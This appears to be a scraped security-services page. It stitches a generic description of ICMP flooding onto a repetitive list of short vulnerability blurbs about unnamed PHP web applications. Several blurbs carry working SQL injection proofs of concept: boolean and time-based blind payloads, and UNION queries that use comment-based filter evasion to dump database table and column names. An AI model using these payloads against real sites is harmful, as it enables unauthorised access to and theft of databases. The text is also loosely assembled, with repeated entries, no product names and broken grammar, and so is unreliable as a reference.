ICMP Flooding is a type of Denial of Service attack in which an attacker sends a large number of ICMP packets to a target system with the intention of overwhelming it. This type of attack is usually used to disrupt network services and can be used to target a single host or an entire network. The attacker can use a variety of techniques to send the ICMP packets, such as spoofing the source address, using a botnet, or using a distributed denial of service (DDoS) attack. The target system will be unable to process the large number of ICMP packets and will eventually become unresponsive.
The vulnerability allows an attacker to inject sql commands into the vulnerable application.
The vulnerability allows an users upload arbitrary file. The vulnerability exists due to insufficient validation of uploaded files in 'add_product.php' script. A remote attacker can upload arbitrary file and execute arbitrary code on the target system.
The vulnerability allows an attacker to inject sql commands into the vulnerable application.
The vulnerability allows an attacker to inject sql commands into the 'preview.php' file, which can be accessed by appending a malicious SQL query to the 'id' parameter.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/city.php?country=[SQL]&state=[SQL] http://localhost/[PATH]/state.php?country=[SQL] Parameter: country (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: country=Russian Federation' AND 6933=6933 AND 'kVcM'='kVcM&state=Moskva Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: country=Russian Federation' AND SLEEP(5) AND 'ZbHT'='ZbHT&state=Moskva
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/success-story.php?succid=[SQL] -12++/*!04444UNION*/+/*!04444SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139--+-
The vulnerability allows an attacker to inject sql commands into the 'state_id' and 's' parameters of the 'city_ajax.php' and 'category_list.php' scripts respectively.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/countrycode1.php?val=[SQL] -1'++/*!07777UNION*/+/*!07777SELECT*/+@@version--+-
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/news-detail.php?newid=[SQL] -7'++/*!00008UNION*/(/*!00008SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!00008Select*/+export_set(5,@:=0,(/*!00008select*/+count(*)/*!00008from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00008table_name*/,0x3c6c693e,2),/*!00008column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
Services By CQR